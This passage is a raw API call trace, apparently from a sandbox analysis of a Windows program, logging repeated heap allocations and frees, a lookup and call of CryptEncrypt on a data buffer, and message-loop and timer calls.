0x2e50a28 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0129.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa916) returned 0x2eca7c0 [0129.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0129.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eca7c0 | out: hHeap=0x970000) returned 1 [0129.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0129.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0129.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0129.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0129.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0129.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0129.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0129.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0129.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0129.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0129.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0129.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0129.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0129.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0129.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0129.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0129.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0129.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0129.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0129.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0129.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0129.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0129.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0129.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0129.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0129.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0129.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0129.174] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0129.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0129.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0129.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0129.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0129.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0129.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0129.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0129.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0129.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0129.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0129.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0129.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0129.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0129.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0129.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0129.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0129.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0129.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0129.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0129.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0129.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0129.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0129.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0129.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0129.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0129.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0129.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0129.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0129.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0129.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0129.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0129.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0129.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0129.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0129.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0129.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0129.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0129.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0129.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0129.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0129.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0129.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0129.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0129.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0129.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0129.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0129.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0129.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0129.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0129.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0129.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50b48 [0129.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0129.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0129.570] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0129.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0129.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0129.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54238 [0129.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0129.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0129.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0129.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0129.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0129.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0129.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0129.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0129.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0129.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0129.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0129.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0129.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0129.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0129.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0129.571] CryptEncrypt (in: hKey=0xa87590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ebfea0*, pdwDataLen=0x8cef60*=0xa916, dwBufLen=0xa918 | out: pbData=0x2ebfea0*, pdwDataLen=0x8cef60*=0xa918) returned 1 [0129.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0129.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0129.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0129.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0129.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0129.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0129.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0129.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0129.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0129.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0129.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0129.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0129.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0129.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0129.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0129.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0129.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0129.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0129.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0129.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0129.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0129.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0129.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0129.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0129.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0129.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0129.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0129.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0129.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0129.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0129.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0129.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0129.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0129.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0129.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0129.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0129.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0129.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0129.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0129.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0129.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0129.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0129.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0129.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0129.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0129.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0129.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0129.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0129.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0129.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0129.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0129.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0129.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0129.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0129.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0129.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0129.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0129.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0129.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0129.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0129.576] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0129.576] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0129.576] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0129.576] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0129.576] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0129.577] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0129.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0129.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0129.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0129.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0129.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0129.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0129.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0129.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0129.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0129.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0129.577] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0129.577] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0129.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0129.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0129.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0129.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0129.577] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0129.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0129.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0129.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0129.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0129.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0129.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0129.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0129.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0129.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0129.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0129.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0129.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 